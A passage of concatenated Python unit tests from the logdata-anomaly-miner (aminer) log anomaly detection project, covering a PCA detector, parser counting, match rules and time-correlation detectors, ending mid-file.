pca_detector.receive_atom(log_atom_1) pca_detector.receive_atom(log_atom_2) pca_detector.receive_atom(log_atom_3) pca_detector.receive_atom(log_atom_4) pca_detector.receive_atom(log_atom_5) pca_detector.receive_atom(log_atom_6) self.assertFalse(test_handler.anomalies) # Log atoms of window 4 build the count vector for that window # Input: b; log atoms of window 4 # Expected output: No anomalies reported pca_detector.receive_atom(log_atom_7) pca_detector.receive_atom(log_atom_8) pca_detector.receive_atom(log_atom_9) pca_detector.receive_atom(log_atom_10) pca_detector.receive_atom(log_atom_11) self.assertFalse(test_handler.anomalies) # At this point, the event count matrix contains the counts from the first three windows self.assertEqual(pca_detector.event_count_matrix, [{'/value': {'a': 2, 'b': 1}}, {'/value': {'a': 1, 'b': 1}}, {'/value': {'a': 1, 'b': 0}}]) # The count vector contains the counts of the fourth window self.assertEqual(pca_detector.event_count_vector, {'/value': {'a': 4, 'b': 1}}) # Log atom of window 5 triggers comparison of count vector from window 4 with PCA # Input: log atoms of window 5 # Expected output: Anomaly reported on count vector of fourth window pca_detector.receive_atom(log_atom_12) self.assertEqual(test_handler.anomalies, [{'AnalysisComponent': {'AffectedLogAtomPaths': ['/value'], 'AffectedLogAtomValues': [['a', 'b']], 'AffectedValueCounts': [[4, 1]], 'AnomalyScore': 9.0}}]) # Event count matrix is shifted by 1 so that window 0 is removed and window 4 is appended self.assertEqual(pca_detector.event_count_matrix, [{'/value': {'a': 1, 'b': 1}}, {'/value': {'a': 1, 'b': 0}}, {'/value': {'a': 4, 'b': 1}}]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/ParserCountTest.py000066400000000000000000000165361437606560100273010ustar00rootroot00000000000000from aminer.analysis.ParserCount import ParserCount, current_processed_lines_str, total_processed_lines_str from aminer.input.LogAtom import LogAtom from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase import time class ParserCountTest(TestBase): """Unittests for the ParserCount.""" match_context_m1 = MatchContext(b'First string') match_context_m2 = MatchContext(b' to match.') match_context_m3 = MatchContext(b'some completely other string to match.') match_context_seq = MatchContext(b'First string to match.') fixed_dme_m1 = FixedDataModelElement('m1', b'First string') fixed_dme_m2 = FixedDataModelElement('m2', b' to match.') seq = SequenceModelElement('seq', [fixed_dme_m1, fixed_dme_m2]) fixed_dme_m3 = FixedDataModelElement('m3', b'some completely other string to match.') match_element_m1 = fixed_dme_m1.get_match_element('fixed', match_context_m1) match_element_m2 = fixed_dme_m2.get_match_element('fixed', match_context_m2) match_element_m3 = fixed_dme_m3.get_match_element('fixed', match_context_m3) match_element_seq = seq.get_match_element('fixed', match_context_seq) def test1log_atom_not_in_path_list(self): """This unittest checks if no action happens, when no path in the match_dictionary matches a path.""" parser_count = ParserCount(self.aminer_config, ['fixed/seq', 'fixed/seq/m1', 'fixed/seq/m2'], [self.stream_printer_event_handler]) t = time.time() log_atom = LogAtom(self.fixed_dme_m3.fixed_data, ParserMatch(self.match_element_m3), t, parser_count) old_count_dict = dict(parser_count.count_dict) parser_count.receive_atom(log_atom) self.assertEqual(parser_count.count_dict, old_count_dict) def test2log_atom_matches_single_path(self): """This unittest tests the receive_atom method with a single path matching.""" parser_count = ParserCount(self.aminer_config, ['fixed/seq', 'fixed/seq/m1', 'fixed/seq/m2', 'fixed/m3'], [self.stream_printer_event_handler]) t = time.time() log_atom = LogAtom(self.fixed_dme_m3.fixed_data, ParserMatch(self.match_element_m3), t, parser_count) old_count_dict = dict(parser_count.count_dict) old_count_dict['fixed/m3'][current_processed_lines_str] = 1 old_count_dict['fixed/m3'][total_processed_lines_str] = 1 parser_count.receive_atom(log_atom) self.assertEqual(parser_count.count_dict, old_count_dict) def test3log_atom_matches_multiple_paths(self): """This unittest tests the receive_atom method with multiple paths matching.""" parser_count = ParserCount(self.aminer_config, ['fixed/seq', 'fixed/seq/m1', 'fixed/seq/m2', 'fixed/m3'], [self.stream_printer_event_handler]) t = time.time() log_atom = LogAtom(self.match_context_seq.match_data, ParserMatch(self.match_element_seq), t, parser_count) old_count_dict = dict(parser_count.count_dict) old_count_dict['fixed/seq'][current_processed_lines_str] = 1 old_count_dict['fixed/seq'][total_processed_lines_str] = 1 old_count_dict['fixed/seq/m1'][current_processed_lines_str] = 1 old_count_dict['fixed/seq/m1'][total_processed_lines_str] = 1 old_count_dict['fixed/seq/m2'][current_processed_lines_str] = 1 old_count_dict['fixed/seq/m2'][total_processed_lines_str] = 1 parser_count.receive_atom(log_atom) self.assertEqual(parser_count.count_dict, old_count_dict) def test4do_timer(self): """This unittest checks if the do_timer method works properly.""" parser_count = ParserCount(self.aminer_config, ['fixed/m3'], [self.stream_printer_event_handler], 600) t = time.time() self.assertEqual(int(parser_count.do_timer(t + 100)), 600) self.assertEqual(self.output_stream.getvalue(), "") log_atom = LogAtom(self.match_context_seq.match_data, ParserMatch(self.match_element_seq), t, parser_count) parser_count.receive_atom(log_atom) self.assertEqual(int(parser_count.do_timer(t + 100)), 500) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(parser_count.do_timer(t + 601), 600) self.assertNotEqual(self.output_stream.getvalue(), "") self.reset_output_stream() def test5resetting(self): """This unittest tests the functionality of resetting the counts.""" parser_count = ParserCount(self.aminer_config, ['fixed/seq', 'fixed/seq/m1', 'fixed/seq/m2', 'fixed/m3'], [self.stream_printer_event_handler], 600) parser_count.count_dict['fixed/seq'][current_processed_lines_str] = 5 parser_count.count_dict['fixed/seq'][total_processed_lines_str] = 5 parser_count.count_dict['fixed/seq/m1'][current_processed_lines_str] = 5 parser_count.count_dict['fixed/seq/m1'][total_processed_lines_str] = 5 parser_count.count_dict['fixed/seq/m2'][current_processed_lines_str] = 5 parser_count.count_dict['fixed/seq/m2'][total_processed_lines_str] = 5 parser_count.count_dict['fixed/m3'][current_processed_lines_str] = 17 parser_count.count_dict['fixed/m3'][total_processed_lines_str] = 17 old_count_dict = dict(parser_count.count_dict) parser_count.send_report() self.assertEqual(parser_count.count_dict, old_count_dict) parser_count.send_report() old_count_dict['fixed/seq'][current_processed_lines_str] = 0 old_count_dict['fixed/seq/m1'][current_processed_lines_str] = 0 old_count_dict['fixed/seq/m2'][current_processed_lines_str] = 0 old_count_dict['fixed/m3'][current_processed_lines_str] = 0 self.assertEqual(parser_count.count_dict, old_count_dict) def test6receive_atom_without_target_paths(self): """This unittest tests the receive_atom method with multiple paths matching without having target_paths specified.""" parser_count = ParserCount(self.aminer_config, None, [self.stream_printer_event_handler]) t = time.time() log_atom = LogAtom(self.match_context_seq.match_data, ParserMatch(self.match_element_seq), t, parser_count) old_count_dict = dict(parser_count.count_dict) old_count_dict['fixed/seq'] = {current_processed_lines_str: 1, total_processed_lines_str: 1} parser_count.receive_atom(log_atom) self.assertEqual(parser_count.count_dict, old_count_dict) def test7initialize_errored_target_label_list(self): """Initialize the ParserCount class with errored target_label_list parameters and check if an error is raised.""" self.assertRaises(ValueError, ParserCount, self.aminer_config, None, [self.stream_printer_event_handler], target_label_list=['p']) self.assertRaises(ValueError, ParserCount, self.aminer_config, ['path1', 'path2'], [self.stream_printer_event_handler], target_label_list=['p']) self.assertRaises(ValueError, ParserCount, self.aminer_config, ['path1'], [self.stream_printer_event_handler], target_label_list=['p1', 'p2']) ParserCount(self.aminer_config, ['path'], [self.stream_printer_event_handler], target_label_list=['p']) logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/RulesTest.py000066400000000000000000000573611437606560100261270ustar00rootroot00000000000000import unittest from _io import StringIO from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.analysis.Rules import EventGenerationMatchAction, PathExistsMatchRule, ValueMatchRule, ValueListMatchRule, \ ValueRangeMatchRule, StringRegexMatchRule, ModuloTimeMatchRule, ValueDependentModuloTimeMatchRule, IPv4InRFC1918MatchRule, \ AndMatchRule, OrMatchRule, ValueDependentDelegatedMatchRule, NegationMatchRule from aminer.parsing.MatchContext import MatchContext from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.analysis.AtomFilters import SubhandlerFilter from aminer.parsing.FixedDataModelElement import FixedDataModelElement import re from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from time import time from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from unit.TestBase import TestBase from datetime import datetime, timezone class RuleTest(TestBase): """ NOTE: DebugMatchRule and DebugHistoryMatchRule are intentionally not tested, as there is not much to be tested. ParallelMatchRule is also not tested as it is very similar to the OrMatchRule. """ __expected_string = '%s This message was generated, when the unit were successful.\n%s: "%s" (%d lines)\n %s\n\n' match_s1 = 'match/s1' fixed_string = b'fixed String' match_any = 'match/any' alphabet = b'There are 26 letters in the english alphabet' model_syslog_time = '/model/syslog/time' model_syslog = '/model/syslog' match_ipv4 = 'match/IPv4' match_context_fixed_dme = MatchContext(b'25000') fixed_dme = FixedDataModelElement('s1', b'25000') match_element_fixed_dme = fixed_dme.get_match_element("fixed", match_context_fixed_dme) def test1event_generation_match_action(self): """This test case checks if events are generated and pushed to all event handlers.""" description = "Test1Rules" output_stream2 = StringIO() message = 'This message was generated, when the unit were successful.' match_context = MatchContext(b'25537') decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element = decimal_integer_value_me.get_match_element('match', match_context) stream_printer_event_handler2 = StreamPrinterEventHandler(self.analysis_context, output_stream2) t = time() event_generation_match_action = EventGenerationMatchAction('Test.%s' % self.__class__.__name__, message, [ self.stream_printer_event_handler, stream_printer_event_handler2]) self.analysis_context.register_component(event_generation_match_action, description) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), t, event_generation_match_action) event_generation_match_action.match_action(log_atom) self.assertEqual(self.output_stream.getvalue(), output_stream2.getvalue()) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), event_generation_match_action.__class__.__name__, description, 1, log_atom.parser_match.match_element.annotate_match(''))) def test2atom_filter_match_action(self): """This test case proves the functionality of the AtomFilters.""" description = "Test2Rules" newMatchPathDetector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) logAtomFixedDME = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), time(), newMatchPathDetector) subhandlerFilter = SubhandlerFilter([newMatchPathDetector]) self.analysis_context.register_component(subhandlerFilter, description) self.analysis_context.register_component(newMatchPathDetector, description + "2") self.assertTrue(subhandlerFilter.receive_atom(logAtomFixedDME)) def test3path_exists_match_rule(self): """This case unit the PathExistsMatchRule.""" description = "Test3Rules" path_exists_match_rule = PathExistsMatchRule(self.match_s1, None) self.analysis_context.register_component(path_exists_match_rule, description) self.fixed_dme = FixedDataModelElement('s1', self.fixed_string) t = time() match_context = MatchContext(self.fixed_string) match_element = self.fixed_dme.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), t, path_exists_match_rule) self.assertTrue(path_exists_match_rule.match(log_atom)) self.fixed_dme = FixedDataModelElement('s2', self.fixed_string) match_context = MatchContext(self.fixed_string) match_element = self.fixed_dme.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), t, path_exists_match_rule) self.assertTrue(not path_exists_match_rule.match(log_atom)) def test4value_match_rule(self): """This case unit the ValueMatchRule.""" description = "Test4Rules" value_match_rule = ValueMatchRule(self.match_s1, self.fixed_string, None) self.analysis_context.register_component(value_match_rule, description) self.fixed_dme = FixedDataModelElement('s1', self.fixed_string) match_context = MatchContext(self.fixed_string) match_element = self.fixed_dme.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_match_rule) self.assertTrue(value_match_rule.match(log_atom)) self.fixed_dme = FixedDataModelElement('s1', b'another fixed String') match_context = MatchContext(b'another fixed String') match_element = self.fixed_dme.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_match_rule) self.assertTrue(not value_match_rule.match(log_atom)) def test5value_list_match_rule(self): """This case unit the ValueListMatchRule.""" description = "Test5Rules" value_list_match_rule = ValueListMatchRule('match/d1', [1, 2, 4, 8, 16, 32, 64, 128, 256, 512], None) self.analysis_context.register_component(value_list_match_rule, description) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(b'64') match_element = decimal_integer_value_me.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_list_match_rule) self.assertTrue(value_list_match_rule.match(log_atom)) match_context = MatchContext(b'4711') match_element = decimal_integer_value_me.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_list_match_rule) self.assertTrue(not value_list_match_rule.match(log_atom)) def test6value_range_match_rule(self): """This case unit the ValueRangeMatchRule.""" description = "Test6Rules" value_range_match_rule = ValueRangeMatchRule('match/d1', 1, 1000, None) self.analysis_context.register_component(value_range_match_rule, description) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(b'1') match_element = decimal_integer_value_me.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_range_match_rule) self.assertTrue(value_range_match_rule.match(log_atom)) match_context = MatchContext(b'1000') match_element = decimal_integer_value_me.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_range_match_rule) self.assertTrue(value_range_match_rule.match(log_atom)) match_context = MatchContext(b'0') match_element = decimal_integer_value_me.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_range_match_rule) self.assertTrue(not value_range_match_rule.match(log_atom)) match_context = MatchContext(b'1001') match_element = decimal_integer_value_me.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_range_match_rule) self.assertTrue(not value_range_match_rule.match(log_atom)) def test7string_regex_match_rule(self): """This case unit the StringRegexMatchRule.""" description = "Test7Rules" string_regex_match_rule = StringRegexMatchRule(self.match_any, re.compile(rb'\w'), None) self.analysis_context.register_component(string_regex_match_rule, description) any_byte_date_me = AnyByteDataModelElement('any') match_context = MatchContext(self.alphabet) match_element = any_byte_date_me.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, string_regex_match_rule) self.assertTrue(string_regex_match_rule.match(log_atom)) match_context = MatchContext(b'--> There are 26 letters in the english alphabet') match_element = any_byte_date_me.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, string_regex_match_rule) self.assertTrue(not string_regex_match_rule.match(log_atom)) def test8modulo_time_match_rule(self): """This case unit the ModuloTimeMatchRule.""" description = "Test8Rules" modulo_time_match_rule = ModuloTimeMatchRule(self.model_syslog_time, 86400, 43200, 86400, None) self.analysis_context.register_component(modulo_time_match_rule, description) date_time_model_element = DateTimeModelElement('time', b'%d.%m.%Y %H:%M:%S', timezone.utc) match_context = MatchContext(b'14.02.2019 13:00:00') match_element = date_time_model_element.get_match_element(self.model_syslog, match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), date_time_model_element) self.assertTrue(modulo_time_match_rule.match(log_atom)) match_context = MatchContext(b'15.02.2019 00:00:00') match_element = date_time_model_element.get_match_element(self.model_syslog, match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), date_time_model_element) self.assertTrue(not modulo_time_match_rule.match(log_atom)) match_context = MatchContext(b'14.02.2019 12:00:00') match_element = date_time_model_element.get_match_element(self.model_syslog, match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), date_time_model_element) self.assertTrue(modulo_time_match_rule.match(log_atom)) match_context = MatchContext(b'15.02.2019 01:00:00') match_element = date_time_model_element.get_match_element(self.model_syslog, match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), date_time_model_element) self.assertTrue(not modulo_time_match_rule.match(log_atom)) def test9value_dependent_modulo_time_match_rule(self): """This case unit the ValueDependentModuloTimeMatchRule. Limit look up not working with tuples.""" description = "Test9Rules" value_dependent_modulo_time_match_rule = ValueDependentModuloTimeMatchRule(self.model_syslog_time, 86400, [self.model_syslog_time], {1550145600: [43200, 86400]}) self.analysis_context.register_component(value_dependent_modulo_time_match_rule, description) date_time_model_element = DateTimeModelElement('time', b'%d.%m.%Y %H:%M:%S', timezone.utc) match_context = MatchContext(b'14.02.2019 12:00:00') match_element = date_time_model_element.get_match_element(self.model_syslog, match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1550138400, date_time_model_element) self.assertTrue(value_dependent_modulo_time_match_rule.match(log_atom)) def test10ipv4_in_rfc1918_match_rule(self): """This case unit the ValueDependentModuloTimeMatchRule.""" description = "Test10Rules" i_pv4_in_rfc1918_match_rule = IPv4InRFC1918MatchRule(self.match_ipv4) self.analysis_context.register_component(i_pv4_in_rfc1918_match_rule, description) ip_address_data_model_element = IpAddressDataModelElement('IPv4') # private addresses match_context = MatchContext(b'192.168.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'192.168.255.255') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'172.16.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'172.31.255.255') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'10.0.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'10.255.255.255') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(i_pv4_in_rfc1918_match_rule.match(log_atom)) # public addresses match_context = MatchContext(b'192.167.255.255') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(not i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'192.169.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(not i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'172.15.255.255') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(not match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(not i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'172.32.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(not i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'9.255.255.255') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(not i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'11.0.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(not i_pv4_in_rfc1918_match_rule.match(log_atom)) def test11and_match_rule(self): """This case unit the AndMatchRule.""" description = "Test11Rules" path_exists_match_rule = PathExistsMatchRule(self.match_ipv4, None) self.analysis_context.register_component(path_exists_match_rule, description) i_pv4_in_rfc1918_match_rule = IPv4InRFC1918MatchRule(self.match_ipv4) self.analysis_context.register_component(i_pv4_in_rfc1918_match_rule, description + "2") and_match_rule = AndMatchRule([path_exists_match_rule, i_pv4_in_rfc1918_match_rule]) self.analysis_context.register_component(and_match_rule, description + "3") ip_address_data_model_element = IpAddressDataModelElement('IPv4') match_context = MatchContext(b'192.168.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), and_match_rule) self.assertTrue(and_match_rule.match(log_atom)) # changing to IPv6 path_exists_match_rule = PathExistsMatchRule('match/IPv6', None) and_match_rule = AndMatchRule([path_exists_match_rule, i_pv4_in_rfc1918_match_rule]) match_context = MatchContext(b'192.168.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), and_match_rule) self.assertTrue(not and_match_rule.match(log_atom)) def test12or_match_rule(self): """This case unit the OrMatchRule.""" description = "Test12Rules" path_exists_match_rule = PathExistsMatchRule(self.match_ipv4, None) self.analysis_context.register_component(path_exists_match_rule, description) i_pv4_in_rfc1918_match_rule = IPv4InRFC1918MatchRule(self.match_ipv4) self.analysis_context.register_component(i_pv4_in_rfc1918_match_rule, description + "2") or_match_rule = OrMatchRule([path_exists_match_rule, i_pv4_in_rfc1918_match_rule]) self.analysis_context.register_component(or_match_rule, description + "3") ip_address_data_model_element = IpAddressDataModelElement('IPv4') match_context = MatchContext(b'192.168.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), or_match_rule) self.assertTrue(or_match_rule.match(log_atom)) # changing to IPv6 path_exists_match_rule = PathExistsMatchRule('match/IPv6', None) or_match_rule = OrMatchRule([path_exists_match_rule, i_pv4_in_rfc1918_match_rule]) match_context = MatchContext(b'192.168.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), or_match_rule) self.assertTrue(or_match_rule.match(log_atom)) def test13value_dependent_delegated_match_rule(self): """This case unit the ValueDependentDelegatedMatchRule.""" description = "Test13Rules" string_regex_match_rule = StringRegexMatchRule(self.match_any, re.compile(rb'\w'), None) self.analysis_context.register_component(string_regex_match_rule, description) any_byte_date_me = AnyByteDataModelElement('any') i_pv4_in_rfc1918_match_rule = IPv4InRFC1918MatchRule(self.match_ipv4) self.analysis_context.register_component(i_pv4_in_rfc1918_match_rule, description + "2") ip_address_data_model_element = IpAddressDataModelElement('IPv4') value_dependent_delegated_match_rule = ValueDependentDelegatedMatchRule([ self.match_any, self.match_ipv4], {(self.alphabet,): string_regex_match_rule, (3232235520,): i_pv4_in_rfc1918_match_rule}) self.analysis_context.register_component(value_dependent_delegated_match_rule, description + "3") match_context = MatchContext(self.alphabet) match_element = any_byte_date_me.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_dependent_delegated_match_rule) self.assertTrue(value_dependent_delegated_match_rule.match(log_atom)) match_context = MatchContext(b'192.168.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_dependent_delegated_match_rule) self.assertTrue(value_dependent_delegated_match_rule.match(log_atom)) # not matching values match_context = MatchContext(b'.There are 26 letters in the english alphabet') match_element = any_byte_date_me.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_dependent_delegated_match_rule) self.assertTrue(not value_dependent_delegated_match_rule.match(log_atom)) match_context = MatchContext(b'192.168.0.1') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_dependent_delegated_match_rule) self.assertTrue(not value_dependent_delegated_match_rule.match(log_atom)) def test14negation_match_rule(self): """This case unit the NegationMatchRule.""" description = "Test14Rules" path_exists_match_rule = PathExistsMatchRule(self.match_s1, None) self.analysis_context.register_component(path_exists_match_rule, description) negation_match_rule = NegationMatchRule(path_exists_match_rule) self.analysis_context.register_component(negation_match_rule, description + "2") self.fixed_dme = FixedDataModelElement('s1', self.fixed_string) match_context = MatchContext(self.fixed_string) match_element = self.fixed_dme.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, path_exists_match_rule) self.assertTrue(path_exists_match_rule.match(log_atom)) self.assertTrue(not negation_match_rule.match(log_atom)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/TimeCorrelationDetectorTest.py000066400000000000000000000105721437606560100316200ustar00rootroot00000000000000import unittest from unit.TestBase import TestBase from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.MatchContext import MatchContext from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector import time from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from datetime import datetime class TimeCorrelationDetectorTest(TestBase): """Unittests for the TimeCorrlelationDetectorTest.""" __expected_string = '%s Correlation report\nTimeCorrelationDetector: "%s" (%d lines)\n ' string = b'25537 uid=2' datetime_format_string = '%Y-%m-%d %H:%M:%S' fixed_dme = FixedDataModelElement('s1', string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context_first_match_me = MatchContext(string) first_match_me = FirstMatchModelElement('f1', [fixed_dme, decimal_integer_value_me]) match_element_first_match_me = first_match_me.get_match_element('first', match_context_first_match_me) match_context_first_match_me2 = MatchContext(string) first_match_me2 = FirstMatchModelElement('f2', [decimal_integer_value_me, fixed_dme]) match_element_first_match_me2 = first_match_me2.get_match_element('second', match_context_first_match_me2) def test1_normal_report(self): """ This test case unit the creation of a report. As the rules are chosen randomly this test can not be very specific in checking he actual values of the report. """ description = "Test1TimeCorrelationDetector" parallel_check_count = 2 record_count_before_event = 10 output_logline = True use_path_match = True use_value_match = True min_rule_attributes = 1 max_rule_attributes = 5 time_correlation_detector = TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], parallel_check_count, 'Default', record_count_before_event, output_logline, use_path_match, use_value_match, min_rule_attributes, max_rule_attributes) self.analysis_context.register_component(time_correlation_detector, component_name=description) t = time.time() for i in range(0, 10): logAtomSequenceME = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t, time_correlation_detector) time_correlation_detector.receive_atom(logAtomSequenceME) self.assertTrue(self.output_stream.getvalue().startswith( self.__expected_string % (datetime.fromtimestamp(t).strftime(self.datetime_format_string), description, 10))) self.reset_output_stream() for i in range(0, 10): logAtomSequenceME = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t + i, time_correlation_detector) time_correlation_detector.receive_atom(logAtomSequenceME) self.assertTrue(self.output_stream.getvalue().startswith( self.__expected_string % (datetime.fromtimestamp(t + 9).strftime(self.datetime_format_string), description, 20))) self.reset_output_stream() for i in range(10, 15): logAtomSequenceME = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t + i, time_correlation_detector) time_correlation_detector.receive_atom(logAtomSequenceME) logAtomSequenceME2 = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me2), t + i, time_correlation_detector) time_correlation_detector.receive_atom(logAtomSequenceME2) self.assertTrue(self.output_stream.getvalue().startswith( self.__expected_string % (datetime.fromtimestamp(t + 14).strftime(self.datetime_format_string), description, 30))) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/TimeCorrelationViolationDetectorTest.py000066400000000000000000000260471437606560100335110ustar00rootroot00000000000000import unittest import time from aminer.analysis.TimeCorrelationViolationDetector import CorrelationRule, EventClassSelector, TimeCorrelationViolationDetector from aminer.analysis import Rules from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from unit.TestBase import TestBase from datetime import datetime class TimeCorrelationViolationDetectorTest(TestBase): """Unittests for the TimeCorrelationViolationDetector.""" _expected_string = '%s Correlation rule "%s" violated\nTimeCorrelationViolationDetector: "%s" (%d lines)\n FAIL: ' _expected_string_too_early = _expected_string + 'B-Event for "%s" (%s) was found too early!\n\n\n' _expected_string_too_late = _expected_string + 'B-Event for "%s" (%s) was not found in 